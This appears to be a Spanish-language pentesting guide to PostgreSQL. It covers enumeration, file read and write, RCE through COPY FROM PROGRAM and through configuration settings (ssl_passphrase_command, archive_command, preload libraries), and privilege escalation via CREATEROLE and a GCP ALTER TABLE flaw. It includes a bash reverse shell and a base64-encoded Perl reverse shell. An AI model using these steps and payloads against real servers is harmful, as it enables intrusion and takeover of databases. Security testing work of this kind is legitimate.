5432,5433 - Pentesting Postgresql
Utiliza Trickest para construir y automatizar flujos de trabajo fácilmente, impulsados por las herramientas comunitarias más avanzadas del mundo. Obtén acceso hoy:
Información Básica
PostgreSQL se describe como un sistema de base de datos objeto-relacional que es de código abierto. Este sistema no solo utiliza el lenguaje SQL, sino que también lo mejora con características adicionales. Sus capacidades le permiten manejar una amplia gama de tipos de datos y operaciones, lo que lo convierte en una opción versátil para desarrolladores y organizaciones.
Puerto por defecto: 5432, y si este puerto ya está en uso, parece que postgresql utilizará el siguiente puerto (probablemente 5433) que no está en uso.
Conectar y Enumeración Básica
Si al ejecutar \list
encuentras una base de datos llamada rdsadmin
, sabes que estás dentro de una base de datos postgresql de AWS.
Para más información sobre cómo abusar de una base de datos PostgreSQL consulta:
PostgreSQL injectionEnumeración Automática
Escaneo de puertos
Según esta investigación, cuando un intento de conexión falla, dblink
lanza una excepción sqlclient_unable_to_establish_sqlconnection
que incluye una explicación del error. Ejemplos de estos detalles se enumeran a continuación.
El host está inactivo
DETAIL: no se pudo conectar al servidor: No hay ruta al host ¿Está el servidor en el host "1.2.3.4" y aceptando conexiones TCP/IP en el puerto 5678?
El puerto está cerrado
El puerto está abierto
or
El puerto está abierto o filtrado
En las funciones PL/pgSQL, actualmente no es posible obtener detalles de excepciones. Sin embargo, si tienes acceso directo al servidor PostgreSQL, puedes recuperar la información necesaria. Si extraer nombres de usuario y contraseñas de las tablas del sistema no es factible, puedes considerar utilizar el método de ataque de lista de palabras discutido en la sección anterior, ya que podría potencialmente dar resultados positivos.
Enumeración de Privilegios
Roles
Tipos de Rol | |
---|---|
rolsuper | El rol tiene privilegios de superusuario |
rolinherit | El rol hereda automáticamente los privilegios de los roles de los que es miembro |
rolcreaterole | El rol puede crear más roles |
rolcreatedb | El rol puede crear bases de datos |
rolcanlogin | El rol puede iniciar sesión. Es decir, este rol puede ser dado como el identificador de autorización de sesión inicial |
rolreplication | El rol es un rol de replicación. Un rol de replicación puede iniciar conexiones de replicación y crear y eliminar slots de replicación. |
rolconnlimit | Para roles que pueden iniciar sesión, esto establece el número máximo de conexiones concurrentes que este rol puede hacer. -1 significa sin límite. |
rolpassword | No es la contraseña (siempre se lee como |
rolvaliduntil | Tiempo de expiración de la contraseña (solo se usa para autenticación de contraseña); nulo si no hay expiración |
rolbypassrls | El rol elude cada política de seguridad a nivel de fila, consulta Sección 5.8 para más información. |
rolconfig | Valores predeterminados específicos del rol para variables de configuración en tiempo de ejecución |
oid | ID del rol |
Grupos Interesantes
Si eres miembro de
pg_execute_server_program
puedes ejecutar programasSi eres miembro de
pg_read_server_files
puedes leer archivosSi eres miembro de
pg_write_server_files
puedes escribir archivos
Ten en cuenta que en Postgres un usuario, un grupo y un rol son lo mismo. Solo depende de cómo lo uses y si permites que inicie sesión.
Tablas
Funciones
Acciones del sistema de archivos
Leer directorios y archivos
Desde este commit los miembros del grupo definido DEFAULT_ROLE_READ_SERVER_FILES
(llamado pg_read_server_files
) y super usuarios pueden usar el método COPY
en cualquier ruta (consulta convert_and_check_filename
en genfile.c
):
Recuerda que si no eres superusuario pero tienes los permisos CREATEROLE, puedes hacerte miembro de ese grupo:
Hay otras funciones de postgres que se pueden usar para leer un archivo o listar un directorio. Solo superusuarios y usuarios con permisos explícitos pueden usarlas:
Puedes encontrar más funciones en https://www.postgresql.org/docs/current/functions-admin.html
Escritura de Archivos Simple
Solo super usuarios y miembros de pg_write_server_files
pueden usar copy para escribir archivos.
Recuerda que si no eres superusuario pero tienes los permisos CREATEROLE
, puedes hacerte miembro de ese grupo:
Recuerda que COPY no puede manejar caracteres de nueva línea, por lo tanto, incluso si estás usando una carga útil en base64 necesitas enviar una línea única.
Una limitación muy importante de esta técnica es que copy
no se puede usar para escribir archivos binarios ya que modifica algunos valores binarios.
Carga de archivos binarios
Sin embargo, hay otras técnicas para cargar grandes archivos binarios:
Big Binary Files Upload (PostgreSQL)Consejo de bug bounty: regístrate en Intigriti, una plataforma premium de bug bounty creada por hackers, para hackers! Únete a nosotros en https://go.intigriti.com/hacktricks hoy, y comienza a ganar recompensas de hasta $100,000!
Actualización de datos de tabla PostgreSQL a través de escritura en archivo local
Si tienes los permisos necesarios para leer y escribir archivos del servidor PostgreSQL, puedes actualizar cualquier tabla en el servidor sobrescribiendo el nodo de archivo asociado en el directorio de datos de PostgreSQL. Más sobre esta técnica aquí.
Pasos requeridos:
Obtén el directorio de datos de PostgreSQL
Nota: Si no puedes recuperar la ruta del directorio de datos actual de la configuración, puedes consultar la versión principal de PostgreSQL a través de la consulta SELECT version()
e intentar forzar la ruta. Las rutas comunes del directorio de datos en instalaciones de PostgreSQL en Unix son /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/
. Un nombre de clúster común es main
. 2. Obtén una ruta relativa al nodo de archivo, asociado con la tabla objetivo
Esta consulta debería devolver algo como base/3/1337
. La ruta completa en el disco será $DATA_DIRECTORY/base/3/1337
, es decir, /var/lib/postgresql/13/main/base/3/1337
. 3. Descarga el nodo de archivo a través de las funciones lo_*
Obtén el tipo de dato, asociado con la tabla objetivo
Usa el Editor de Nodo de Archivo de PostgreSQL para editar el nodo de archivo; establece todos los flags booleanos
rol*
a 1 para permisos completos.
(Opcional) Limpia la caché de la tabla en memoria ejecutando una consulta SQL costosa
Ahora deberías ver los valores de la tabla actualizados en PostgreSQL.
También puedes convertirte en superadministrador editando la tabla pg_authid
. Consulta la siguiente sección.
RCE
RCE para programa
Desde la versión 9.3, solo superusuarios y miembros del grupo pg_execute_server_program
pueden usar copy para RCE (ejemplo con exfiltración:
Ejemplo para ejecutar:
Recuerda que si no eres superusuario pero tienes los permisos CREATEROLE
puedes hacerte miembro de ese grupo:
O utiliza el módulo multi/postgres/postgres_copy_from_program_cmd_exec
de metasploit.
Más información sobre esta vulnerabilidad aquí. Aunque se reportó como CVE-2019-9193, Postges declaró que esto era una característica y no será corregido.
RCE con lenguajes de PostgreSQL
RCE with PostgreSQL LanguagesRCE con extensiones de PostgreSQL
Una vez que has aprendido del post anterior cómo subir archivos binarios, podrías intentar obtener RCE subiendo una extensión de postgresql y cargándola.
RCE with PostgreSQL ExtensionsRCE con el archivo de configuración de PostgreSQL
Los siguientes vectores de RCE son especialmente útiles en contextos de SQLi restringidos, ya que todos los pasos se pueden realizar a través de declaraciones SELECT anidadas.
El archivo de configuración de PostgreSQL es escribible por el usuario postgres, que es quien ejecuta la base de datos, así que como superusuario, puedes escribir archivos en el sistema de archivos, y por lo tanto puedes sobrescribir este archivo.
RCE con ssl_passphrase_command
Más información sobre esta técnica aquí.
El archivo de configuración tiene algunos atributos interesantes que pueden llevar a RCE:
ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'
Ruta a la clave privada de la base de datosssl_passphrase_command = ''
Si el archivo privado está protegido por contraseña (encriptado), postgresql ejecutará el comando indicado en este atributo.ssl_passphrase_command_supports_reload = off
Si este atributo está activado, el comando ejecutado si la clave está protegida por contraseña se ejecutará cuandopg_reload_conf()
sea ejecutado.
Entonces, un atacante necesitará:
Volcar la clave privada del servidor
Encriptar la clave privada descargada:
rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
Sobrescribir
Volcar la configuración actual de postgresql
Sobrescribir la configuración con la configuración de los atributos mencionados:
ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
ssl_passphrase_command_supports_reload = on
Ejecutar
pg_reload_conf()
Mientras probaba esto, noté que esto solo funcionará si el archivo de clave privada tiene privilegios 640, es propiedad de root y del grupo ssl-cert o postgres (para que el usuario postgres pueda leerlo), y está ubicado en /var/lib/postgresql/12/main.
RCE con archive_command
Más información sobre esta configuración y sobre WAL aquí.
Otro atributo en el archivo de configuración que es explotable es archive_command
.
Para que esto funcione, la configuración archive_mode
tiene que estar 'on'
o 'always'
. Si eso es cierto, entonces podríamos sobrescribir el comando en archive_command
y forzarlo a ejecutarse a través de las operaciones WAL (write-ahead logging).
Los pasos generales son:
Verificar si el modo de archivo está habilitado:
SELECT current_setting('archive_mode')
Sobrescribir
archive_command
con la carga útil. Por ejemplo, un shell inverso:archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
Recargar la configuración:
SELECT pg_reload_conf()
Forzar la operación WAL para que se ejecute, lo que llamará al comando de archivo:
SELECT pg_switch_wal()
oSELECT pg_switch_xlog()
para algunas versiones de Postgres
RCE con bibliotecas de precarga
Más información sobre esta técnica aquí.
Este vector de ataque aprovecha las siguientes variables de configuración:
session_preload_libraries
-- bibliotecas que serán cargadas por el servidor PostgreSQL en la conexión del cliente.dynamic_library_path
-- lista de directorios donde el servidor PostgreSQL buscará las bibliotecas.
Podemos establecer el valor de dynamic_library_path
a un directorio, escribible por el usuario postgres
que ejecuta la base de datos, por ejemplo, el directorio /tmp/
, y subir un objeto .so
malicioso allí. A continuación, forzaremos al servidor PostgreSQL a cargar nuestra biblioteca recién subida incluyéndola en la variable session_preload_libraries
.
Los pasos del ataque son:
Descargar el
postgresql.conf
originalIncluir el directorio
/tmp/
en el valor dedynamic_library_path
, por ejemplo,dynamic_library_path = '/tmp:$libdir'
Incluir el nombre de la biblioteca maliciosa en el valor de
session_preload_libraries
, por ejemplo,session_preload_libraries = 'payload.so'
Verificar la versión principal de PostgreSQL a través de la consulta
SELECT version()
Compilar el código de la biblioteca maliciosa con el paquete de desarrollo correcto de PostgreSQL. Código de ejemplo:
Compilando el código:
Subir el
postgresql.conf
malicioso, creado en los pasos 2-3, y sobrescribir el originalSubir el
payload.so
del paso 5 al directorio/tmp
Recargar la configuración del servidor reiniciando el servidor o invocando la consulta
SELECT pg_reload_conf()
En la próxima conexión a la base de datos, recibirás la conexión de shell inverso.
Postgres Privesc
Privesc de CREATEROLE
Conceder
Según la documentación: Los roles que tienen el privilegio CREATEROLE
pueden conceder o revocar la membresía en cualquier rol que no sea un superusuario.
Así que, si tienes permiso CREATEROLE
, podrías concederte acceso a otros roles (que no son superusuario) que pueden darte la opción de leer y escribir archivos y ejecutar comandos:
Modificar Contraseña
Los usuarios con este rol también pueden cambiar las contraseñas de otros no superusuarios:
Privesc a SUPERUSER
Es bastante común encontrar que los usuarios locales pueden iniciar sesión en PostgreSQL sin proporcionar ninguna contraseña. Por lo tanto, una vez que hayas reunido permisos para ejecutar código, puedes abusar de estos permisos para otorgarte el rol de SUPERUSER
:
Esto suele ser posible debido a las siguientes líneas en el pg_hba.conf
archivo:
ALTER TABLE privesc
En este informe se explica cómo fue posible el privesc en Postgres GCP abusando del privilegio ALTER TABLE que se otorgó al usuario.
Cuando intentas hacer que otro usuario sea propietario de una tabla, deberías recibir un error que lo impida, pero aparentemente GCP le dio esa opción al usuario postgres que no es superusuario en GCP:
Uniendo esta idea con el hecho de que cuando se ejecutan los comandos INSERT/UPDATE/ANALYZE en una tabla con una función de índice, la función es llamada como parte del comando con los permisos del propietario de la tabla. Es posible crear un índice con una función y dar permisos de propietario a un superusuario sobre esa tabla, y luego ejecutar ANALYZE sobre la tabla con la función maliciosa que podrá ejecutar comandos porque está utilizando los privilegios del propietario.
Explotación
Comience creando una nueva tabla.
Inserte contenido irrelevante en la tabla para proporcionar datos para la función de índice.
Desarrolle una función de índice maliciosa que contenga una carga útil de ejecución de código, permitiendo que se ejecuten comandos no autorizados.
ALTERE el propietario de la tabla a "cloudsqladmin", que es el rol de superusuario de GCP utilizado exclusivamente por Cloud SQL para gestionar y mantener la base de datos.
Realice una operación ANALYZE en la tabla. Esta acción obliga al motor de PostgreSQL a cambiar al contexto de usuario del propietario de la tabla, "cloudsqladmin". En consecuencia, la función de índice maliciosa se llama con los permisos de "cloudsqladmin", lo que permite la ejecución del comando de shell previamente no autorizado.
En PostgreSQL, este flujo se ve algo así: